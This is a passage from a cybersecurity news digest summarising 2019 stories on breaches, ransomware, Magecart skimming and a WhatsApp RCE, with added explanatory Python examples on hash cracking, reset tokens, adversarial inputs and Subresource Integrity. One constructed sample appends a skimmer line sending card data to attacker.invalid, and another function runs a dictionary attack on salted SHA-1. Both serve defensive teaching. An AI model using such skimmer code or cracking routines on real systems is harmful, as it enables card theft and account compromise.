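    """Server side: restore padding and recover the wire-format query."""
    return base64.urlsafe_b64decode(param + "=" * (-len(param) % 4))


def read_name(msg: bytes, off: int) -> Tuple[str, int]:
    """Decode a possibly compressed name; return (name, offset just past it)."""
    labels, end, jumped = [], off, False
    while True:
        ln = msg[off]
        if ln & 0xC0 == 0xC0:                          # pointer to an earlier name
            if not jumped:
                end = off + 2
            off, jumped = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF, True
            continue
        if ln == 0:
            if not jumped:
                end = off + 1
            return ".".join(labels), end
        labels.append(msg[off + 1:off + 1 + ln].decode("ascii"))
        off += 1 + ln


def parse_response(msg: bytes) -> Tuple[int, List[Tuple[str, int, int, str]]]:
    """Return (rcode, [(name, type, ttl, rdata), ...]) from the answer section."""
    _, flags, qd, an, _, _ = struct.unpack("!HHHHHH", msg[:12])
    if not flags & 0x8000:
        raise ValueError("QR bit clear: not a response")
    off = 12
    for _ in range(qd):                                # skip the echoed question(s)
        _, off = read_name(msg, off)
        off += 4
    answers = []
    for _ in range(an):
        name, off = read_name(msg, off)
        rtype, _, ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        rdata = msg[off:off + rdlen]
        off += rdlen
        text = ".".join(str(b) for b in rdata) if rtype == QTYPE_A and rdlen == 4 else rdata.hex()
        answers.append((name, rtype, ttl, text))
    return flags & 0x000F, answers


def build_answer(query: bytes, ip: str, ttl: int = 300) -> bytes:
    """Constructed resolver reply for an A query: echo the question and add one A
    record whose owner name is a compression pointer to the question name at offset 12."""
    header = struct.pack("!HHHHHH", 0, 0x8180, 1, 1, 0, 0)   # QR, RD, RA set; rcode 0
    rr = struct.pack("!HHHIH", 0xC00C, QTYPE_A, 1, ttl, 4) + bytes(int(o) for o in ip.split("."))
    return header + query[12:] + rr
```

    The controversy in the article follows directly from the first two functions: once the query is inside an HTTPS request to a resolver the browser chooses, a network operator no longer sees a UDP/53 packet it can inspect, log, or filter, only TLS traffic indistinguishable from any other web request.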

  • news

    "Majority of IT Departments Leave Major Holes in Their USB Drive Security"

    In a new study, it was found that even though 87% of organizations use USB drives, the majority of IT departments aren't implementing tools to manage USB device usage. Nearly 6 out of 10 organizations (58%) do not use port control / whitelisting software to manage USB device usage. More than a quarter of organizations (26%) do not use software-based encryption, and less than half of organizations (47%) require the deployment of encryption for data stored on the USB drive. An overwhelming 91% of employees that participated in this study thought that encrypted USB drives should be mandatory.

    Help Net Security reports: "Majority of IT Departments Leave Major Holes in Their USB Drive Security"

  • news

    "New Report Outlines IoT Security Vulnerabilities"

    A new Internet of Things (IoT) report released by the consulting and research firm Independent Security Evaluators (ISE) details security vulnerabilities in 13 popular small office/home office (SOHO) routers and network-attached storage (NAS) devices. The study of these devices resulted in 125 CVEs (Common Vulnerabilities and Exposures). According to the report, all 13 devices examined contained one or more web application vulnerabilities. Exploiting these vulnerabilities could allow attackers to compromise additional network devices, obtain sensitive information transmitted via the devices, disable networks, and more. This article continues to discuss key findings of the IoT security report, the impact of IoT security vulnerabilities, how these weaknesses can be eliminated, what improvements have been made in IoT security, and the need for IoT device manufacturers to prioritize security.

    CPO Magazine reports "New Report Outlines IoT Security Vulnerabilities"

  • news

    "Wireless Security Institute Established at Idaho National Laboratory to Improve 5G Technology"

    5G is the next generation of wireless technology and is expected to bring improvements in bandwidth, capacity, and reliability. However, the arrival of 5G networks is also expected to introduce new security vulnerabilities. As the implementation of 5G technology continues to grow, data protection technologies and 5G security protocols need to be developed and validated. Idaho National Laboratory (INL) has established the INL Wireless Security Institute to lead research conducted by government, academia, and private industry aimed at making 5G wireless technology more secure and reliable. The institute will work with public and private leaders in the wireless communication field to prioritize security tasks and increase efforts to improve security. This article continues to discuss what is expected of 5G wireless technology and how the INL Wireless Security Institute will support efforts to improve it.

    INL reports "Wireless Security Institute Established at Idaho National Laboratory to Improve 5G Technology"

  • news

    "Phishing Attempts Increase 400%, Many Malicious URLs Found on Trusted Domains"

    A new study has found that nearly a quarter (24%) of malicious URLs are hosted on trusted domains. Attackers do this because URLs on trusted domains raise less suspicion among users and are more difficult for security controls to block. The study also found that 1 in 50 URLs (1.9%) was malicious, a high rate given that nearly a third (33%) of office workers click more than 25 work-related links per day. Nearly a third (29%) of detected phishing web pages use HTTPS, relying on the padlock symbol to persuade users that they are on a trusted site. Phishing attempts grew rapidly, with a 400% increase in phishing URLs discovered from January to July 2019. The industries most often impersonated by phishing are SaaS/webmail providers (25%), financial institutions (19%), social media (16%), retail (14%), file hosting (11%), and payment services companies (8%).

    Help Net Security reports: "Phishing Attempts Increase 400%, Many Malicious URLs Found on Trusted Domains"

  • news

    "New Tech Aims to Tell Pilots When Their Plane Has Been Hacked"

    The U.S. defense contractor Raytheon is developing new technology that would alert pilots if their aircraft is being hacked. The U.S. military expects the hacking of aircraft to be a major tactic in future warfare. The Cyber Anomaly Detection System will give pilots details about a hacking incident in real time, allowing them to decide what needs to be done to resolve the problem. Most aircraft have their important electronics and avionics systems connected to a serial data bus, which is said to lack security in many U.S. military planes. An aircraft's attack surface grows as more technology and commercial products are added to it. This article continues to discuss a potential scenario in which a helicopter is hacked, the growing vulnerability of aviation platforms to infiltration by hackers, the discovery of vulnerabilities in the F-15E Strike Eagle fighter jet, and the Cyber Anomaly Detection System aimed at alerting pilots to cyberattacks on their aircraft.

    Defense One reports "New Tech Aims to Tell Pilots When Their Plane Has Been Hacked"

  • news

    Visible to the public "Hacking for the Public Good"

    A panel at the Black Hat USA 2019 conference highlighted the use of hacking skills for good, countering the common perception of hacking as inherently malicious. Panelists emphasized that white-hat hackers and IT security industry groups apply their skills in ways that bolster digital security for both the public and private sectors. Ethical hacking can uncover security vulnerabilities in products and raise awareness of how malicious actors could exploit them. This article continues to discuss the importance of ethical hackers, the Electronic Frontier Foundation, the introduction of new threats, and efforts to increase understanding surrounding these threats.

    GCN reports "Hacking for the Public Good"

  • news

    Visible to the public "APT Groups Exploiting Flaws in Unpatched VPNs, Officials Warn"

    The U.S. National Security Agency (NSA) and the United Kingdom's National Cyber Security Centre (NCSC) issued alerts about the exploitation, by state-sponsored advanced persistent threat (APT) groups, of vulnerabilities in outdated VPN products from Pulse Secure, Fortinet, and Palo Alto Networks. According to the alerts, exploiting these vulnerabilities could allow APT actors to gain access to VPN devices, change configuration settings, run secondary exploits, and more. Officials recommend several mitigations, including applying the vendors' patches, resetting existing credentials (since credentials may already have been stolen from a vulnerable device), and enabling multi-factor authentication. This article continues to discuss the release of warnings about the abuse of flaws in unpatched VPNs, the vulnerabilities in outdated VPN products, and the mitigations recommended by officials.

    Threatpost reports "APT Groups Exploiting Flaws in Unpatched VPNs, Officials Warn"

  • news

    Visible to the public "Researcher Shows How Adversaries Can Gather Intel on U.S. Critical Infrastructure"

    A researcher known as Wojciech used open source intelligence (OSINT) and a tool he developed, called Kamerka, to demonstrate the ease with which adversaries can collect intelligence on U.S. critical infrastructure. Using Kamerka, Wojciech discovered 26,000 internet-exposed industrial control system (ICS) devices in the U.S. The tool also let him determine the geographical locations of these ICS devices and identify the critical infrastructure targets that would be most attractive to threat actors. Atlanta, Houston, Chicago, New York, Denver, and Philadelphia are the cities with the highest percentage of these devices. This article continues to discuss Kamerka's capabilities, the discovery of exposed ICS devices in the U.S., the vulnerabilities in such devices, and the potential use of OSINT by adversaries to perform reconnaissance on U.S. critical infrastructure.

    Security Week reports "Researcher Shows How Adversaries Can Gather Intel on U.S. Critical Infrastructure"

  • news

    Visible to the public "218 million Words With Friends Players Lose Data to Hackers"

    Words With Friends, Zynga's popular multiplayer crossword-style game, has suffered a breach. The hacker or hacking group known as GnosticPlayers gained access to details on more than 218 million users: all Android and iOS players who installed and signed up for the game on or before September 2, 2019. The exposed data includes names, email addresses, login IDs, salted SHA-1 password hashes, password reset tokens (if ever requested), phone numbers (if provided), Facebook IDs (if connected), and Zynga account IDs. It is not believed that the attackers obtained any credit card information used for payments within the application.

    Naked Security reports: "218 million Words With Friends Players Lose Data to Hackers"
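    The breach above exposed salted SHA-1 password hashes. The salt defeats precomputed lookup tables, but because SHA-1 is a fast hash, each leaked record can still be attacked offline at the rate of one hash per guess. The example below, added here and not code from the article or from Zynga, contrasts that with a deliberately slow key-derivation function. The exact salted-SHA-1 construction (SHA1(salt || password)), the wordlist and the salt are assumptions made for illustration.

```python
import hashlib
import hmac
import os

# Constructed sample wordlist and salt; illustrative values, not data from the breach.
WORDLIST = ["123456", "password", "letmein", "qwerty123", "wordswithfriends"]
SALT = bytes.fromhex("a1b2c3d4e5f60718")


def salted_sha1(password: str, salt: bytes) -> bytes:
    """Salted SHA-1 as assumed here: SHA1(salt || password).
    The page only says 'SHA1 with salt'; the concatenation order is an assumption."""
    return hashlib.sha1(salt + password.encode()).digest()


def crack_salted_sha1(target: bytes, salt: bytes, wordlist):
    """Offline dictionary attack against one leaked salted SHA-1 hash.
    The salt is stored beside the hash, so it blocks only precomputed tables,
    not a per-user brute force; every guess costs a single SHA-1 call.
    Returns (recovered_password, guesses_tried) or (None, guesses_tried)."""
    for attempts, guess in enumerate(wordlist, start=1):
        if hmac.compare_digest(salted_sha1(guess, salt), target):
            return guess, attempts
    return None, len(wordlist)


def pbkdf2_hash(password: str, salt: bytes, iterations: int = 600_000) -> bytes:
    """Hardened alternative: a slow, iterated KDF (PBKDF2-HMAC-SHA256).
    Each guess now costs `iterations` HMAC invocations instead of one hash."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)


def make_record(password: str, iterations: int = 600_000) -> dict:
    """What to store per user: a fresh random salt, the work factor and the derived key."""
    salt = os.urandom(16)
    return {"salt": salt, "iterations": iterations,
            "hash": pbkdf2_hash(password, salt, iterations)}


def verify_record(password: str, record: dict) -> bool:
    """Constant-time check of a login attempt against a stored record."""
    candidate = pbkdf2_hash(password, record["salt"], record["iterations"])
    return hmac.compare_digest(candidate, record["hash"])


if __name__ == "__main__":
    leaked = salted_sha1("letmein", SALT)
    print(crack_salted_sha1(leaked, SALT, WORDLIST))
    rec = make_record("letmein", iterations=10_000)
    print(verify_record("letmein", rec), verify_record("letmeout", rec))
```

    Storing the iteration count with each record lets the work factor be raised later without invalidating old hashes; records below the current factor can be re-derived at the user's next successful login.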

  • news

    Visible to the public "Research Aims to Help Social Media Users Secure Their Information"

    Researchers at the University of North Georgia (UNG) are developing tools to help Facebook, Twitter, and Instagram users protect their sensitive data. Dr. Ahmad Ghafarian and three UNG students are performing experiments that examine how much information social media use leaves stored on computers and in web browsers. The researchers want to find out how easily an attacker could exfiltrate personal data while a social media user is logged into an account on a particular machine. They are also looking for security vulnerabilities in popular social media platforms in order to develop tools that help people protect their accounts and information. This article continues to discuss the goals, activities, and support of this research.

    UNG reports "Research Aims to Help Social Media Users Secure Their Information"

  • news

    Visible to the public "Iranian Hackers Targeted a U.S. Presidential Campaign, Microsoft Says"

    Researchers from the Microsoft Threat Intelligence Center discovered more than 2,000 attempts, attributed to Iranian hackers, to compromise email accounts associated with a U.S. presidential campaign, government officials, journalists, and prominent Iranians living outside Iran. The hacking group, which Microsoft calls Phosphorus, attacked 241 email accounts and successfully compromised four of them. According to the researchers, the attackers gained access to the four accounts by abusing password reset features, drawing on a large amount of personal information gathered about the targets. This article continues to discuss the attempted hacks on a U.S. presidential campaign, their perpetrators, targets, and impact, as well as other incidents that have raised concerns surrounding the 2020 election.

    CNET reports "Iranian Hackers Targeted a U.S. Presidential Campaign, Microsoft Says"
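    Two items above touch on password reset: the Phosphorus intrusions abused reset features using researched personal information, and the Words With Friends breach leaked stored password reset tokens. The following example, added here and not code from either article or from any of the companies involved, shows a reset-token store that depends on neither: tokens are random rather than derived from anything an attacker could look up, only a hash of each token is stored so a database leak does not yield usable tokens, and every token expires and is consumed on first use. The 15-minute validity window and the class and method names are assumptions for illustration.

```python
import hashlib
import secrets
import time

TOKEN_TTL_SECONDS = 15 * 60  # assumption: a 15-minute validity window


class ResetTokenStore:
    """Server-side store for password-reset tokens (hypothetical helper).

    Properties demonstrated:
      * the token is 256 bits from the OS CSPRNG, not a knowledge-based secret;
      * only SHA-256(token) is persisted, so a leaked table cannot be replayed;
      * a token is removed the first time it is presented, valid or not;
      * an expired token is refused even if it was never used.
    """

    def __init__(self, now=time.time):
        self._now = now      # injectable clock so expiry can be tested deterministically
        self._records = {}   # sha256(token) -> (user_id, expires_at)

    @staticmethod
    def _digest(token: str) -> bytes:
        # Keying the table by digest is safe: recovering a token from its
        # digest would require a SHA-256 preimage.
        return hashlib.sha256(token.encode()).digest()

    def issue(self, user_id: str) -> str:
        """Create a token for user_id. The clear token goes only to the user's
        verified contact address; it is never written to storage."""
        token = secrets.token_urlsafe(32)
        self._records[self._digest(token)] = (user_id, self._now() + TOKEN_TTL_SECONDS)
        return token

    def redeem(self, token: str):
        """Return the user_id if the token is valid, else None.
        The record is popped on first presentation, making the token single-use."""
        record = self._records.pop(self._digest(token), None)
        if record is None:
            return None
        user_id, expires_at = record
        if self._now() > expires_at:
            return None
        return user_id

    def pending(self) -> int:
        """Number of tokens not yet redeemed or purged."""
        return len(self._records)


if __name__ == "__main__":
    store = ResetTokenStore()
    t = store.issue("alice")
    print(store.redeem(t), store.redeem(t))  # alice, then None
```

    Because no personal detail is involved, an attacker who has assembled a target's biography gains nothing against this flow; the remaining attack surface is the delivery channel (the mailbox or phone the token is sent to), which should itself be protected by multi-factor authentication.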

  • news

    Visible to the public "Intel Proposes New SAPM Memory Type to Protect Against Spectre-Like Attacks"

    Intel recently published a paper describing a new type of CPU memory, called Speculative-Access Protected Memory (SAPM), designed to protect against Spectre, Meltdown, ZombieLoad, and other speculative execution side-channel attacks. Such attacks exploit the way high-performance microprocessors predict and execute future instructions ahead of time: misspeculated instructions are discarded architecturally but leave traces in microarchitectural state, which attackers can observe through side channels to recover sensitive data from memory. A team at Intel STORM (Strategic Offensive Research and Mitigation) has proposed replacing the current CPU memory system with SAPM, which would serve as an alternative to existing hardware- and software-level mitigations. This article continues to discuss speculative side-channel attacks as well as the SAPM memory type proposed by Intel to protect against them.

    ZDNet reports "Intel Proposes New SAPM Memory Type to Protect Against Spectre-Like Attacks"

  • news

    Visible to the public "Alabama Hospitals Pay Out in Ransomware Attack Amid FBI Warning of More to Come"

    Alabama-based DCH Health System has paid the attackers behind a ransomware attack that severely disrupted operations at three of its hospitals. The ransomware variant involved is Ryuk, which has recently become a global threat; there is good evidence that Ryuk attacks are coordinated by a single Russia-based cybercrime group known as GRIM SPIDER. Ransomware attacks are becoming more targeted, sophisticated, and costly, even as their overall frequency remains steady. Victims are advised not to pay the ransom: the attacker may never hand over the decryption key, and an organization that has paid once is more likely to be attacked again because the attackers now know it is willing to pay.

    GIZMODO reports: "Alabama Hospitals Pay Out in Ransomware Attack Amid FBI Warning of More to Come"

  • news

    Visible to the public "How Kids Get into Hacking"

    A new study by researchers from Michigan State University examines the characteristics and gender-specific behaviors that lead kids into juvenile hacking. Prior research has focused on the scope of hacking and the threat it poses, but little is understood about the background factors, social connections, and personality traits that set a child on that path. Thomas Holt, lead author and MSU cybercrime expert in the School of Criminal Justice, identified predictors of hacking by examining responses from 50,000 teens. Predictors include low self-control, negative peer associations, and an obsession with playing computer games; the predictors also differ between boys and girls. This article continues to discuss the predictors of juvenile hacking, the differences in predictors based on gender, and how parents can encourage their kids to use their skills in a positive way.

    Homeland Security News Wire reports "How Kids Get into Hacking"

  • news

    Visible to the public "URGENT/11: FDA Issues Alert for Cyber Vulnerability That Threatens Medical Devices, Networks"

    An alert has been issued by the U.S. Food and Drug Administration (FDA) for healthcare organizations, IT professionals, device manufacturers, and patients pertaining to a collection of security vulnerabilities, called URGENT/11, that affect connected medical devices and hospital networks. According to FDA officials, the exploitation of URGENT/11 vulnerabilities could allow attackers to perform malicious activities such as hijacking medical devices remotely, changing device functions, launching denial-of-service attacks, leaking sensitive information, and more. The vulnerabilities affect at least six different operating systems including VxWorks, INTEGRITY, and ZebOS. This article continues to discuss what the abuse of URGENT/11 vulnerabilities can allow attackers to do, which operating systems are affected by the security flaws, and suggestions on how to address these vulnerabilities.

    Healthcare IT News reports "Urgent/11: FDA Issues Alert for Cyber Vulnerability That Threatens Medical Devices, Networks"

  • news

    Visible to the public "Blind Spots in AI Just Might Help Protect Your Privacy"

    Significant advances have been made in machine learning (ML), which has helped detect cancer and predict personal traits, and which underpins self-driving cars and highly accurate facial recognition. However, ML models remain vulnerable to adversarial examples: inputs crafted by an attacker to make a model produce incorrect output, which in the case of a self-driving car can endanger users' safety. According to privacy-focused researchers at the Rochester Institute of Technology and Duke University, adversarial examples also have a bright side: the same inputs can be used to protect data and defend users' privacy against models that profile them. This article continues to discuss ML applications, the use of adversarial examples to disrupt the success of ML models, Facebook's Cambridge Analytica incident, the never-ending cat-and-mouse game of predicting and protecting private user data, and research surrounding the use of adversarial examples to protect data.

    Wired reports "Blind Spots in AI Just Might Help Protect Your Privacy"
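    To make the mechanism concrete, the following added example (not code from the article or from the RIT and Duke researchers) applies the fast gradient sign method to a toy logistic-regression "profiler": each input feature is nudged by at most eps in the direction that increases the model's loss, and the decision flips while the perturbation stays small. The same perturbation, applied by a user to the data a profiling model consumes, is the privacy use the article describes. The model weights, bias and sample input are constructed assumptions, not a trained model.

```python
import math

# Constructed toy model: a logistic-regression "profiler" with fixed weights.
# These values are an assumption for illustration, not a real or trained model.
WEIGHTS = [1.2, -0.8, 0.5, 2.0]
BIAS = -0.3


def sigmoid(z: float) -> float:
    return 1.0 / (1.0 + math.exp(-z))


def predict_proba(x) -> float:
    """P(class = 1 | x) for the linear model."""
    return sigmoid(sum(w * xi for w, xi in zip(WEIGHTS, x)) + BIAS)


def predict(x) -> int:
    return 1 if predict_proba(x) >= 0.5 else 0


def fgsm(x, eps: float):
    """Fast Gradient Sign Method (Goodfellow et al.): move every feature by +/- eps
    in the direction that increases the logistic loss of the model's current
    prediction. The perturbation is bounded by eps in every coordinate (L-infinity),
    yet for a linear model the score shifts by eps * sum(|w_i|), enough to flip it."""
    y = predict(x)
    p = predict_proba(x)
    # For a linear model, d(logistic loss)/dx_i = (p - y) * w_i.
    grad = [(p - y) * w for w in WEIGHTS]
    sign = lambda g: (g > 0) - (g < 0)
    return [xi + eps * sign(g) for xi, g in zip(x, grad)]


def smallest_flipping_eps(x, step: float = 0.01, max_eps: float = 1.0):
    """Smallest eps on a grid at which FGSM changes the decision, or None."""
    original = predict(x)
    for k in range(1, int(round(max_eps / step)) + 1):
        eps = k * step
        if predict(fgsm(x, eps)) != original:
            return round(eps, 6)
    return None


def linf_distance(a, b) -> float:
    return max(abs(ai - bi) for ai, bi in zip(a, b))


if __name__ == "__main__":
    x = [0.5, 0.2, 0.1, 0.3]          # constructed sample input
    adv = fgsm(x, 0.25)
    print(predict(x), predict(adv), linf_distance(x, adv))
    print(smallest_flipping_eps(x))
```

    For this model the score changes by 4.5 * eps, so any eps above about 0.176 flips the prediction. Real models are non-linear, but the same first-order step is what makes image and text classifiers fail on inputs that look unchanged to a human, and what the privacy research above turns to the user's advantage.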

  • news

    Visible to the public "WhatsApp Vulnerability Could Compromise Android Smartphones"

    New research has revealed a remote code execution (RCE) flaw in WhatsApp that could be used to compromise not only the app but the mobile device it runs on. The critical issue (CVE-2019-11932) affects the Android version of the app on Android 8.1 and 9.0, though apparently not on Android 8.0 (Apple's iOS does not appear to be affected). The attack begins by sending the victim a malicious GIF image through any channel: email, a rival messaging app, or WhatsApp itself. If WhatsApp is used and the attacker (or an unwitting intermediary) is in the victim's contacts, the GIF downloads to the device automatically. The flaw is triggered when the recipient later opens the WhatsApp Gallery, even if no file is selected or sent. The exploit can give an attacker a full reverse shell with root privileges and complete access to all files on the device, its SD card, and, it appears, the WhatsApp message database.

    Naked Security reports: "WhatsApp Vulnerability Could Compromise Android Smartphones"

  • news

    Visible to the public "Alabama Hospitals Forced to Close After Ransomware Attack"

    Healthcare organizations are increasingly being targeted in ransomware attacks, as shown by recent attacks on hospitals in Alabama, Ohio, West Virginia, and the Australian state of Victoria. One recent ransomware attack forced the closure of three hospitals in Alabama run by the nonprofit DCH Health System. Security experts encourage the health industry to adopt a more proactive approach to disaster recovery (DR) planning, mitigating security vulnerabilities, and bolstering cybersecurity resilience. Hospital IT teams should update their DR strategies and invest in technologies that ensure continuous availability of patient data and significantly reduce downtime in the event of a ransomware attack or other cyberattack. This article continues to discuss recent ransomware attacks on healthcare organizations and the actions the healthcare industry should take to address such attacks.

    SiliconANGLE reports "Alabama Hospitals Forced to Close After Ransomware Attack"

  • news

    Visible to the public "Magecart Web Skimming Group Targets Public Hotspots and Mobile Users"

    Magecart is a collective label for multiple sophisticated hacking groups that steal payment card numbers through web-based card-skimming attacks. Security researchers from IBM's X-Force Incident Response and Intelligence Services team have discovered that Magecart Group 5 (MG5) is testing malicious scripts designed to be injected into websites through commercial routers, such as those serving public hotspots, in order to steal payment details from users behind them. Previous Magecart attacks largely focused on injecting card skimmers directly into checkout pages. High-profile brands targeted by Magecart include British Airways, Ticketmaster, and Newegg. This article continues to discuss the new tactics being used by this Magecart group to pilfer payment card information and the X-Force team's advice for website owners on how to protect their users from such attacks.

    CSO Online reports "Magecart Web Skimming Group Targets Public Hotspots and Mobile Users"
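    Whether a skimmer is injected on a compromised server or by a router in the path, the browser ends up executing a script the site owner did not publish. One standard browser control that catches a modified script is Subresource Integrity (SRI): the page pins each script's digest in an integrity attribute and the browser refuses a resource whose digest does not match. The example below, added here and not code from the article or from X-Force, implements the browser-side check, including the rule that when several algorithms are listed only the strongest one counts. The script bodies and the exfiltration hostname are constructed for the illustration.

```python
import base64
import hashlib
import hmac

SUPPORTED = {"sha256": hashlib.sha256, "sha384": hashlib.sha384, "sha512": hashlib.sha512}
STRENGTH = {"sha256": 1, "sha384": 2, "sha512": 3}


def sri_value(body: bytes, alg: str = "sha384") -> str:
    """Build an integrity attribute value for a resource: '<alg>-<base64 digest>'."""
    return f"{alg}-{base64.b64encode(SUPPORTED[alg](body).digest()).decode()}"


def parse_integrity(attr: str) -> dict:
    """Parse a space-separated integrity attribute into {alg: [digests]}.
    Unsupported algorithms and malformed tokens are skipped, as a browser does;
    anything after '?' in a token is an option string and is ignored."""
    parsed = {}
    for token in attr.split():
        alg, sep, rest = token.partition("-")
        if not sep or alg not in SUPPORTED:
            continue
        digest = rest.split("?", 1)[0]
        parsed.setdefault(alg, []).append(digest)
    return parsed


def sri_verify(body: bytes, attr: str) -> bool:
    """Accept the body only if its digest matches one of the values listed under the
    strongest algorithm present. Per the SRI spec, an attribute with no usable
    token places no constraint and the resource is allowed."""
    parsed = parse_integrity(attr)
    if not parsed:
        return True
    best = max(parsed, key=lambda a: STRENGTH[a])
    actual = base64.b64encode(SUPPORTED[best](body).digest()).decode()
    return any(hmac.compare_digest(actual, expected) for expected in parsed[best])


# Constructed sample: a legitimate checkout script and a tampered copy with a
# skimmer-style exfiltration line appended (attacker.invalid is a reserved name).
GENUINE = b"function pay(form){ return submit(form); }\n"
TAMPERED = GENUINE + (b"new Image().src='https://attacker.invalid/c?'"
                      b"+encodeURIComponent(document.forms[0].card.value);\n")

if __name__ == "__main__":
    pinned = sri_value(GENUINE)
    print(pinned)
    print(sri_verify(GENUINE, pinned), sri_verify(TAMPERED, pinned))
```

    The caveat a practitioner should keep in mind: SRI protects only the resources the page pins. If the injecting device can rewrite the HTML itself (as a hostile router on a plaintext connection can), it can add a new script tag without any integrity attribute, so SRI is useful only together with HTTPS for the page and a Content Security Policy that restricts where scripts may load from.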

  • news

    Visible to the public "Preventing Manipulation in Automated Face Recognition"

    The adoption and implementation of automated face recognition continues to increase. However, this method of authentication remains vulnerable to morphing attacks in which different facial images are merged together to create a fake image. A photo stored in a biometric passport that has been altered in such a manner can allow two different people to use the same passport. A team of researchers from the Fraunhofer Institute and the Heinrich Hertz Institute are working on developing a process that uses machine learning methods to prevent the success of morphing attacks in a project called ANANAS (Anomaly Detection for Prevention of Attacks on Authentication Systems Based on Facial Images). This article continues to discuss the biometric facial recognition process, the execution of morphing attacks, and the research project aimed at preventing such attacks.

    TechXplore reports "Preventing Manipulation in Automated Face Recognition"